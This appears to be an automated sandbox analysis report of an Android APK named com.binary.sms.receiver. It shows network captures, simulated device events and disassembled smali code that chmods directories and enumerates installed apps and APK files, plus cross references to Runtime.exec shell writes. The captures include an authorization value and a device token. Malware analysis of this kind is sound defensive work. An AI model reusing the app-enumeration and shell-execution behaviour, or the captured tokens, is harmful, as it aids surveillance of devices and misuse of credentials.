    Mar 6, 2023 08:14:09.366591930 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.366632938 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.366632938 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.387594938 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.426122904 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.426307917 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.459095955 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.473751068 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.493793964 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.493849039 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.500344038 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.541441917 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.564214945 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.568842888 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.569015026 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.571922064 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.571990013 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.572093964 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.579830885 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.579890013 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.643635035 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.643786907 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.644288063 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.644316912 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.644937038 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.645307064 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.646358013 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.646444082 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.662334919 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.662372112 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.662498951 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.671431065 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.671458960 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.711801052 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.817639112 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.817907095 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.817949057 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.817979097 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.818422079 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.818655014 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:09.818710089 CET44343100172.217.16.142192.168.2.30
    Mar 6, 2023 08:14:09.818749905 CET43100443192.168.2.30172.217.16.142
    Mar 6, 2023 08:14:16.416441917 CET50458443192.168.2.30216.58.212.170
    Mar 6, 2023 08:14:16.928443909 CET39602443192.168.2.30142.250.186.163
    Mar 6, 2023 08:14:24.609133959 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:24.626342058 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:29.606826067 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:29.607531071 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:29.624492884 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:29.624689102 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:32.289800882 CET50458443192.168.2.30216.58.212.170
    Mar 6, 2023 08:14:33.313829899 CET39602443192.168.2.30142.250.186.163
    Mar 6, 2023 08:15:03.524641991 CET50458443192.168.2.30216.58.212.170
    Mar 6, 2023 08:15:05.572681904 CET39602443192.168.2.30142.250.186.163
    TimestampSource PortDest PortSource IPDest IP
    Mar 6, 2023 08:16:46.575516939 CET6867192.168.2.30192.168.2.1
    Mar 6, 2023 08:16:46.575930119 CET6768192.168.2.1192.168.2.30
    • android.clients.google.com
    Session IDSource IPSource PortDestination IPDestination Port
    0192.168.2.3043100172.217.16.142443
    TimestampkBytes transferredDirectionData
    2023-03-06 07:14:09 UTC0OUTPOST /c2dm/register3 HTTP/1.1
    Authorization: AidLogin 3976102378291501644:1184905049225720946
    app: com.google.android.gms
    gcm_ver: 210214031
    User-Agent: Android-GCM/1.5 (x86 PI)
    content-length: 477
    content-type: application/x-www-form-urlencoded
    Host: android.clients.google.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    2023-03-06 07:14:09 UTC0OUTData Raw: 58 2d 73 75 62 74 79 70 65 3d 37 34 35 34 37 36 31 37 37 36 32 39 26 58 2d 58 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 3d 37 34 35 34 37 36 31 37 37 36 32 39 26 73 65 6e 64 65 72 3d 37 34 35 34 37 36 31 37 37 36 32 39 26 58 2d 58 2d 73 75 62 74 79 70 65 3d 37 34 35 34 37 36 31 37 37 36 32 39 26 58 2d 61 70 70 5f 76 65 72 3d 32 31 30 32 31 34 30 33 31 26 58 2d 6f 73 76 3d 32 38 26 58 2d 63 6c 69 76 3d 69 69 64 2d 32 31 30 32 31 34 30 30 30 26 58 2d 67 6d 73 76 3d 32 31 30 32 31 34 30 33 31 26 58 2d 61 70 70 69 64 3d 66 53 57 4a 69 50 55 4d 56 37 30 26 58 2d 73 63 6f 70 65 3d 44 49 52 45 43 54 42 4f 4f 54 26 58 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 3d 37 34 35 34 37 36 31 37 37 36 32 39 26 58 2d 61 70 70 5f 76 65 72 5f 6e 61 6d 65 3d 32 31 2e 30 32 2e 31 34
    Data Ascii: X-subtype=745476177629&X-X-subscription=745476177629&sender=745476177629&X-X-subtype=745476177629&X-app_ver=210214031&X-osv=28&X-cliv=iid-210214000&X-gmsv=210214031&X-appid=fSWJiPUMV70&X-scope=DIRECTBOOT&X-subscription=745476177629&X-app_ver_name=21.02.14
    2023-03-06 07:14:09 UTC0INHTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Date: Mon, 06 Mar 2023 07:14:09 GMT
    Expires: Mon, 06 Mar 2023 07:14:09 GMT
    Cache-Control: private, max-age=0
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Security-Policy: frame-ancestors 'self'
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Accept-Ranges: none
    Vary: Accept-Encoding
    Connection: close
    Transfer-Encoding: chunked
    2023-03-06 07:14:09 UTC1INData Raw: 39 65 0d 0a 74 6f 6b 65 6e 3d 66 53 57 4a 69 50 55 4d 56 37 30 3a 41 50 41 39 31 62 46 4b 53 2d 44 68 6f 4f 48 4b 54 47 72 78 32 6b 30 44 70 46 30 43 51 73 53 74 74 6e 58 58 5f 42 30 4a 4b 48 72 75 4d 4e 4b 42 6f 57 5a 4b 4d 68 37 59 32 79 32 7a 72 61 43 53 77 49 59 67 43 53 42 57 7a 50 76 62 47 6d 52 61 78 50 78 67 5a 4f 36 4b 4f 4b 36 71 54 69 38 35 50 4f 45 69 72 35 70 47 54 74 35 50 62 56 49 34 32 72 59 76 6d 6c 57 50 78 44 79 35 53 6e 6b 75 71 4d 4c 2d 54 71 6d 46 58 6b 7a 67 0d 0a
    Data Ascii: 9etoken=fSWJiPUMV70:APA91bFKS-DhoOHKTGrx2k0DpF0CQsSttnXX_B0JKHruMNKBoWZKMh7Y2y2zraCSwIYgCSBWzPvbGmRaxPxgZO6KOK6qTi85POEir5pGTt5PbVI42rYvmlWPxDy5SnkuqML-TqmFXkzg
    2023-03-06 07:14:09 UTC1INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    APK Behavior

    TypeData
    boot completed
    • -
    time tick
    • -
    incoming sms
    • 0123456789
    • this is a text message
    outgoing sms
    • 9876543210
    • thank you
    location change
    • 54.13
    • 12.14
    motion simulation
    • -
    incoming call
    • 0123456789
    outgoing call
    • 9876543210
    time tick
    • -
    View Data
    • Object: android.widget.Button{26a2ce VFED..C.. ......I. 0,0-56,48 #7f070003 app:id/back}
    • X: 28
    • Y: 296
    • Label: Back
    • Object: android.widget.Button{400c8fc VFED..C.. ......ID 56,0-117,48 #7f070004 app:id/clear}
    • X: 86
    • Y: 296
    • Label: Clear
    • Object: android.widget.Button{7a8b85 VFED..C.. ......ID 117,1-239,49 #7f070005 app:id/chooseContact}
    • X: 178
    • Y: 297
    • Label: Choose Contact
    • Object: android.widget.Button{88e1dda VFED..C.. ......ID 239,1-292,49 #7f070006 app:id/send}
    • X: 265
    • Y: 297
    • Label: Send
    • Object: android.widget.EditText{3192af6 VFED..CL. ......ID 0,0-455,140 #7f070000 app:id/editor}
    • X: 227
    • Y: 106
    • Object: android.widget.EditText{8b2b164 VFED..CL. ......ID 0,140-455,188 #7f070001 app:id/phoneNumber}
    • X: 227
    • Y: 200
    • Object: android.widget.EditText{d7a2fcd VFED..CL. ......ID 0,188-455,236 #7f070002 app:id/smsBody}
    • X: 227
    • Y: 248

    0 Executed Methods

    87 Non-Executed Methods

    APIs
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • com.binary.sms.receiver.SkeletonActivity.chmodRec
    • com.binary.sms.receiver.SkeletonActivity.getPackageManager
    • java.io.File.isDirectory
    • java.io.File.listFiles
    • android.content.pm.PackageManager.getInstalledApplications
    • java.util.List.iterator
    • java.util.Iterator.hasNext
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.getAbsolutePath
    • java.lang.String.endsWith
    • java.io.File.getAbsolutePath
    • android.content.pm.PackageManager.getPackageArchiveInfo
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • android.content.pm.PackageInfo.packageName:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • android.content.pm.PackageInfo.applicationInfo:Landroid/content/pm/ApplicationInfo
    • android.content.pm.ApplicationInfo.name:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.content.pm.PackageInfo.activities:[Landroid/content/pm/ActivityInfo
    • android.content.pm.PackageInfo.activities:[Landroid/content/pm/ActivityInfo
    • android.content.pm.PackageInfo.services:[Landroid/content/pm/ServiceInfo
    • android.content.pm.PackageInfo.services:[Landroid/content/pm/ServiceInfo
    • android.content.pm.PackageInfo.receivers:[Landroid/content/pm/ActivityInfo
    • android.content.pm.PackageInfo.receivers:[Landroid/content/pm/ActivityInfo
    • java.lang.StringBuilder.<init>
    • android.content.pm.ActivityInfo.name:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • android.content.pm.ServiceInfo.name:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • android.content.pm.ActivityInfo.name:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Throwable.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.util.Iterator.next
    • java.lang.StringBuilder.<init>
    • android.content.pm.ApplicationInfo.toString
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • android.content.pm.ApplicationInfo.packageName:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • android.content.pm.ApplicationInfo.sourceDir:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • android.content.pm.ApplicationInfo.name:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • apksDirectoryPath:
    • packageInfo- ************************************* by package info *****************
    • apk
    • apk packgeInfo:
    • apk packageName:
    • apk name:
    • Activity name:
    • Service name:
    • receiver name:
    • getPackageArchiveInfo activity iter
    • getPackageArchiveInfo iter
    • getPackageArchiveInfo:
    • getApkInfos
    • packageInfo-
    • packageInfo Installed package-
    • packageInfo sourceDir-
    • packageInfo name-
    Position Instruction Meta Information
    0.param p1, "apksDirectoryPath" # Ljava/lang/String;
    1.prologue
    2new-instance v9, Ljava/lang/StringBuilder;
    4const-string v10, "apksDirectoryPath: "
    6invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    7move-object/from16 v0, p1
    9invoke-virtual {v9, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    10move-result-object v9
    12invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    13move-result-object v9
    15invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    16try_start_14: new-instance v2, Ljava/io/File;
    17move-object/from16 v0, p1
    19invoke-direct {v2, v0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    20move-object/from16 v0, p0
    22invoke-direct {v0, v2}, Lcom/binary/sms/receiver/SkeletonActivity;->chmodRec(Ljava/io/File;)V
    24invoke-virtual/range {p0 .. p0}, Lcom/binary/sms/receiver/SkeletonActivity;->getPackageManager()Landroid/content/pm/PackageManager;
    25move-result-object v8
    27invoke-virtual {v2}, Ljava/io/File;->isDirectory()Z
    28try_end_27: move-result v9
    29if-eqz v9, :cond_33
    30try_start_2a:
    31invoke-virtual {v2}, Ljava/io/File;->listFiles()[Ljava/io/File;
    32move-result-object v11
    33array-length v12, v11
    34try_end_2f: const/4 v9, 0x0
    35move v10, v9
    36goto_31: if-lt v10, v12, :cond_49
    37cond_33:
    38const-string v9, "packageInfo- ************************************* by package info ***************** "
    40invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    41const/16 v9, 0x80
    43invoke-virtual {v8, v9}, Landroid/content/pm/PackageManager;->getInstalledApplications(I)Ljava/util/List;
    44move-result-object v6
    46invoke-interface {v6}, Ljava/util/List;->iterator()Ljava/util/Iterator;
    47move-result-object v9
    48goto_42:
    49invoke-interface {v9}, Ljava/util/Iterator;->hasNext()Z
    50try_end_45: move-result v10
    51if-nez v10, :cond_18c
    52goto_48: return-void
    53cond_49: aget-object v4, v11, v10
    54try_end_4b: new-instance v9, Ljava/lang/StringBuilder;
    56const-string v13, "apksDirectoryPath: "
    58invoke-direct {v9, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    60invoke-virtual {v4}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    61move-result-object v13
    63invoke-virtual {v9, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    64move-result-object v9
    66invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    67move-result-object v9
    69invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    71invoke-virtual {v4}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    72move-result-object v9
    74const-string v13, "apk"
    76invoke-virtual {v9, v13}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z
    77move-result v9
    78if-eqz v9, :cond_d3
    80invoke-virtual {v4}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    81move-result-object v9
    82const/16 v13, 0xf
    84invoke-virtual {v8, v9, v13}, Landroid/content/pm/PackageManager;->getPackageArchiveInfo(Ljava/lang/String;I)Landroid/content/pm/PackageInfo;
    85move-result-object v7
    86if-eqz v7, :cond_d3
    87new-instance v9, Ljava/lang/StringBuilder;
    89const-string v13, "apk packgeInfo: "
    91invoke-direct {v9, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    93invoke-virtual {v9, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
    94move-result-object v9
    96invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    97move-result-object v9
    99invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    100new-instance v9, Ljava/lang/StringBuilder;
    102const-string v13, "apk packageName: "
    104invoke-direct {v9, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    106iget-object v13, v7, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
    108invoke-virtual {v9, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    109move-result-object v9
    111invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    112move-result-object v9
    114invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    115new-instance v9, Ljava/lang/StringBuilder;
    117const-string v13, "apk name: "
    119invoke-direct {v9, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    121iget-object v13, v7, Landroid/content/pm/PackageInfo;->applicationInfo:Landroid/content/pm/ApplicationInfo;
    123iget-object v13, v13, Landroid/content/pm/ApplicationInfo;->name:Ljava/lang/String;
    125invoke-virtual {v9, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    126move-result-object v9
    128invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    129move-result-object v9
    131invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    132try_start_b5:
    133iget-object v9, v7, Landroid/content/pm/PackageInfo;->activities:[Landroid/content/pm/ActivityInfo;
    134if-eqz v9, :cond_bf
    136iget-object v13, v7, Landroid/content/pm/PackageInfo;->activities:[Landroid/content/pm/ActivityInfo;
    137array-length v14, v13
    138const/4 v9, 0x0
    139goto_bd: if-lt v9, v14, :cond_d8
    140cond_bf:
    141iget-object v9, v7, Landroid/content/pm/PackageInfo;->services:[Landroid/content/pm/ServiceInfo;
    142if-eqz v9, :cond_c9
    144iget-object v13, v7, Landroid/content/pm/PackageInfo;->services:[Landroid/content/pm/ServiceInfo;
    145array-length v14, v13
    146const/4 v9, 0x0
    147goto_c7: if-lt v9, v14, :cond_f3
    148cond_c9:
    149iget-object v9, v7, Landroid/content/pm/PackageInfo;->receivers:[Landroid/content/pm/ActivityInfo;
    150if-eqz v9, :cond_d3
    152iget-object v13, v7, Landroid/content/pm/PackageInfo;->receivers:[Landroid/content/pm/ActivityInfo;
    153array-length v14, v13
    154const/4 v9, 0x0
    155goto_d1: if-lt v9, v14, :cond_10e
    156cond_d3: add-int/lit8 v9, v10, 0x1
    157move v10, v9
    158goto/16 :goto_31
    159cond_d8: aget-object v1, v13, v9
    160new-instance v15, Ljava/lang/StringBuilder;
    162const-string v16, "Activity name: "
    164invoke-direct/range {v15 .. v16}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    166iget-object v0, v1, Landroid/content/pm/ActivityInfo;->name:Ljava/lang/String;
    167move-object/from16 v16, v0
    169invoke-virtual/range {v15 .. v16}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    170move-result-object v15
    172invoke-virtual {v15}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    173move-result-object v15
    175invoke-static {v15}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    176add-int/lit8 v9, v9, 0x1
    177goto/16 :goto_bd
    178cond_f3: aget-object v1, v13, v9
    179new-instance v15, Ljava/lang/StringBuilder;
    181const-string v16, "Service name: "
    183invoke-direct/range {v15 .. v16}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    185iget-object v0, v1, Landroid/content/pm/ServiceInfo;->name:Ljava/lang/String;
    186move-object/from16 v16, v0
    188invoke-virtual/range {v15 .. v16}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    189move-result-object v15
    191invoke-virtual {v15}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    192move-result-object v15
    194invoke-static {v15}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    195add-int/lit8 v9, v9, 0x1
    196goto/16 :goto_c7
    197cond_10e: aget-object v1, v13, v9
    198new-instance v15, Ljava/lang/StringBuilder;
    200const-string v16, "receiver name: "
    202invoke-direct/range {v15 .. v16}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    204iget-object v0, v1, Landroid/content/pm/ActivityInfo;->name:Ljava/lang/String;
    205move-object/from16 v16, v0
    207invoke-virtual/range {v15 .. v16}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    208move-result-object v15
    210invoke-virtual {v15}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    211move-result-object v15
    213invoke-static {v15}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    214try_end_126: add-int/lit8 v9, v9, 0x1
    215goto/16 :goto_d1
    216catch_129: move-exception v3
    217try_start_12a: new-instance v9, Ljava/lang/StringBuilder;
    219const-string v13, "getPackageArchiveInfo activity iter"
    221invoke-direct {v9, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    223invoke-virtual {v3}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    224move-result-object v13
    226invoke-virtual {v9, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    227move-result-object v9
    229invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    230move-result-object v9
    232invoke-static {v9, v3}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    233try_end_140: goto/16 :goto_d3
    234catch_141: move-exception v3
    235try_start_142: new-instance v9, Ljava/lang/StringBuilder;
    237const-string v13, "getPackageArchiveInfo iter"
    239invoke-direct {v9, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    241invoke-virtual {v3}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    242move-result-object v13
    244invoke-virtual {v9, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    245move-result-object v9
    247invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    248move-result-object v9
    250invoke-static {v9, v3}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    251try_end_158: goto/16 :goto_d3
    252catch_15a: move-exception v3
    253try_start_15b: new-instance v9, Ljava/lang/StringBuilder;
    255const-string v10, "getPackageArchiveInfo: "
    257invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    259invoke-virtual {v3}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    260move-result-object v10
    262invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    263move-result-object v9
    265invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    266move-result-object v9
    268invoke-static {v9, v3}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    269try_end_171: goto/16 :goto_33
    270catch_173: move-exception v3
    271new-instance v9, Ljava/lang/StringBuilder;
    273const-string v10, "getApkInfos"
    275invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    277invoke-virtual {v3}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
    278move-result-object v10
    280invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    281move-result-object v9
    283invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    284move-result-object v9
    286invoke-static {v9, v3}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    287goto/16 :goto_48
    288cond_18c:
    289invoke-interface {v9}, Ljava/util/Iterator;->next()Ljava/lang/Object;
    290move-result-object v5
    291check-cast v5, Landroid/content/pm/ApplicationInfo;
    292new-instance v10, Ljava/lang/StringBuilder;
    294const-string v11, "packageInfo-"
    296invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    298invoke-virtual {v5}, Landroid/content/pm/ApplicationInfo;->toString()Ljava/lang/String;
    299move-result-object v11
    301invoke-virtual {v10, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    302move-result-object v10
    304invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    305move-result-object v10
    307invoke-static {v10}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    308new-instance v10, Ljava/lang/StringBuilder;
    310const-string v11, "packageInfo Installed package-"
    312invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    314iget-object v11, v5, Landroid/content/pm/ApplicationInfo;->packageName:Ljava/lang/String;
    316invoke-virtual {v10, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    317move-result-object v10
    319invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    320move-result-object v10
    322invoke-static {v10}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    323new-instance v10, Ljava/lang/StringBuilder;
    325const-string v11, "packageInfo sourceDir-"
    327invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    329iget-object v11, v5, Landroid/content/pm/ApplicationInfo;->sourceDir:Ljava/lang/String;
    331invoke-virtual {v10, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    332move-result-object v10
    334invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    335move-result-object v10
    337invoke-static {v10}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    338new-instance v10, Ljava/lang/StringBuilder;
    340const-string v11, "packageInfo name-"
    342invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    344iget-object v11, v5, Landroid/content/pm/ApplicationInfo;->name:Ljava/lang/String;
    346invoke-virtual {v10, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    347move-result-object v10
    349invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    350move-result-object v10
    352invoke-static {v10}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    353try_end_1e4: goto/16 :goto_42
    Cross References
    APIs
    • com.binary.sms.receiver.SkeletonActivity.getApplicationContext
    • android.content.Context.getPackageName
    • java.lang.StringBuilder.<init>
    • com.binary.sms.receiver.SkeletonActivity.getApplicationContext
    • android.content.Context.getPackageName
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Runtime.getRuntime
    • java.lang.Runtime.exec
    • java.lang.Process.getOutputStream
    • java.io.DataOutputStream.<init>
    • java.io.DataOutputStream.writeBytes
    • java.io.DataOutputStream.flush
    • java.lang.Thread.currentThread
    • java.lang.Thread.sleep
    • java.lang.Process.waitFor
    • android.os.Message.obtain
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • com.binary.sms.receiver.SkeletonActivity.access$0
    • android.widget.EditText.setText
    • com.binary.sms.receiver.SkeletonActivity.copyDataData
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.String.valueOf
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.writeBytes
    • java.io.DataOutputStream.flush
    • android.os.Message.obtain
    • android.os.Message.obtain
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • com.binary.sms.receiver.SkeletonActivity.access$0
    • android.widget.EditText.setText
    • com.binary.sms.receiver.SkeletonActivity.copyDataData
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
